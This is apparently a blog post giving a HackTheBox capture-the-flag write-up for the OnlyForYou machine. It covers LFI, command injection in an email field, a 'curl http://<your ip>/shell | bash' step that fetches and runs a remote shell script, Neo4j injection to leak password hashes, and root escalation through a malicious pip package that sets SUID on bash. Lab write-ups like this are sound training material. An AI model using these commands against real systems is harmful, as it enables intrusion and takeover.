Open in app

Sign in

Write

Sign in

OnlyForYou (HTB)Writeup in Saitleop way!

Saitleop
6 min readMay 13, 2023

--

Wassup guyz, hope you all are alright, after the mind boggling response at my last blog about hacking APIs and will try to be more consistent now…..

Here I am with a entire new concept of CTF writeups, now here I won’t be usually giving writeups by just giving you the commands, here I’ll actual tell, how can YOU yes YOU will not require to have a look at a writeup if you encounter the same problem, here I’ll be telling how to actually make a confident guess at finding out a vuln or an exploitation vector which is a very crucial for solving jeopardy type CTFs.

Now wait did you say jeopardy? which pokemon is it?

So there are various types of CTFs and jeopardy is one of them where you just pwn the box and obtain a flag. There are other types of CTFs too like attack-defence where you have to get into the system and patch so others cant get in.

Let’s beginnn…

So today’s box will be a writeup for Onlyforyou box from HackTheBox which a place where you can practice your hacking skills, for beginners i’d highly recommend starting from TryHackMe.

Let’s start off, but how???

So in CTFs we usually start off by mapping out the network and gaining some knowledge about the target box.

This can be done by various tools like nmap, autorecon, rustscan etc

nmap -v -sV -sC -sT -T4 -A -O 10.10.11.210 -oN nmap.txt

for checking more info of the switches i used you refer to the nmap manuel by nmap -h command. In short the switches I used scans for running services version, default scrips, TCP scan with level 4 and stores it in nmap.txt file.

we see ssh and http ports open, lets access the webserver in that case

PORT      STATE    SERVICE VERSION
22/tcp    open     ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 e883e0a9fd43df38198aaa35438411ec (RSA)
|   256 83f235229b03860c16cfb3fa9f5acd08 (ECDSA)
|_  256 445f7aa377690a77789b04e09f11db80 (ED25519)
80/tcp    open     http    nginx 1.18.0 (Ubuntu)
|_http-title: Only4you
|_http-server-header: nginx/1.18.0 (Ubuntu)
| http-methods: 
|_  Supported Methods: OPTIONS HEAD GET POST
32594/tcp filtered unknown
49023/tcp filtered unknown
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Ooo we get a weird error in that we need to add the ip in our /etc/hosts file

Now I want you to have your burp suite loaded and every traffic passing through the burp proxy.

hmm nothing interesting here, whats next?

Lets try running a directory bruteforce for finding sus pages, i’ll be using gobuster you can use your preferred, i recommend trying with FFUF.

Nothing interesting here too, uhh….

No worries lets find some subdomains

gobuster vhost -u http://10.10.11.210 -w /home/saitleop/SecLists/Discovery/DNS/subdomains-top1million-5000.txt --append-domain

we do get some subdomains les add them to the /etc/hosts file too.

on beta.only4you we get the source which is very noice, its makes our exploitation vector to spot more easy.

Do you see something sus in the source code??

Recall Local File Inclusion, yeah u got it…

lets exploit it go on /list and intercept the download request, and put /etc/passwd instead of the pixels.

We got our lfi, les gooo

Now time to enumerate some more things, look at the server header we find it uses NGINX server, it helps to narrow our enumeration.

Usually in this try fuzzing with a wordlist for juicy things.

I did the same by using LFI wordlist which in the Seclist using burp intruder.

Before that did we have a look here?

Here exists an RCE, you would have completely missed it, which tells us that we should some have a look at every feature, do your best before asking for help :)

name=ok&email=sus@ok.com;curl <ip>&subject=idk

if you open a webserver on your end, you receive a GET request which approves rce.

we wont be able to get a reverse shell by directly executing command so why not make a file which does the same??

Save this in a file.

and one email field do

curl http://<your ip>/shell | bash

open netcat listener to listen for connection and we receive a connection

NOICE….

hmm nothing sus for horizontal priv esc for user flag lets run linpeas.sh

we dont see much but we see other services running on localhost

how do we access it??? Let’s introduce you to reverse proxies

A reverse proxy is an application that sits in front of back-end applications and forwards client requests to those applications. Basically we will be able to access these ports on our local instance by this lets use FRP

GitHub - fatedier/frp: A fast reverse proxy to help you expose a local server behind a NAT or…

A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet. - GitHub …

github.com

use the FRPS on your end and FRPC in the box in /tmp directory

on your system we run nohup ./frps -p 7000 &

and on the client transfer the executable of frpc and frpc_ini by replacing your ip in there. Run

nohup ./frpc -c frpc_ini &

we get a connection, u can check the nohup.out log file for errors

now go to http://127.0.0.1:8001 we get an admin panel lets try admin:admin

we r in, lets gooooo

We see a search box, hmm our 6th sense smells some SQLI in here as it uses Neo4j it will more of be a Neo4j sql injection

hmm after scrolling through haktricks and trying payloads we get

on our webserver we get the hash for user and admin

the password for admin by cracking obtained is

admin:ThisIs4you

try ssh as john user, we get logged in.

we get the user flag

Now root

by sudo -l we see

/usr/bin/pip3 download has sudo permission and the downloadable file should end with .tar.gz

usually binaries with such permission have to be looked for when escalationg your privileges.

By some research we come here..

Malicious Python Packages and Code Execution via pip download · Embrace The Red

This week I learned about a design flaw with pip download, which allows an adversary to run arbitrary code. I assumed…

embracethered.com

and a github repo for the poc

GitHub - wunderwuzzi23/this_is_fine_wuzzi: Demo of a malicious python package that will run code…

Basic PyPi package that runs a command upon pip download or pip install. The setup.py file contains the info to run a…

github.com

go to the setup.py file and replace this snippet

replace the print command by first importing os module and putting

os.system("chmod u+s /bin/bash")

now build the file to obtain the tar.gz file by the command

python3 -m build (first download by pip3 install build)

now upload the file in the gogs warehouse through port 3000

Endgame

now grab the raw downloadable link of the uploaded file from the gogs instance and execute

sudo /usr/bin/pip3 download <link>

next a simple bash -p command and we get the root flag, the file might get removed because of the cron cleanup so make sure to do it fast af.

Congrats you solved it!!!!!!!!!!

Conclusion

I chose this box as my first writeup because it actually had a real life instance, this is actually how we get to find bugs (just ignore the priv esc part). The box maker did a fabulous job making this box.

Bye till that time, see you in the next blog which will be all about starting out a red teamer.

Peace Outtt!!!!

Ctf Writeup
Hackthebox
Hacking
Beginner
Pentesting

--

--

Saitleop

Written by Saitleop

91 Followers

Intermediate level hacker interested in red teaming, web app pentesting, web3 and binary exploitation. Do read my first blog I have told everything about me :D

Help

Status

About

Careers

Press

Blog

Privacy

Terms

Text to speech

Teams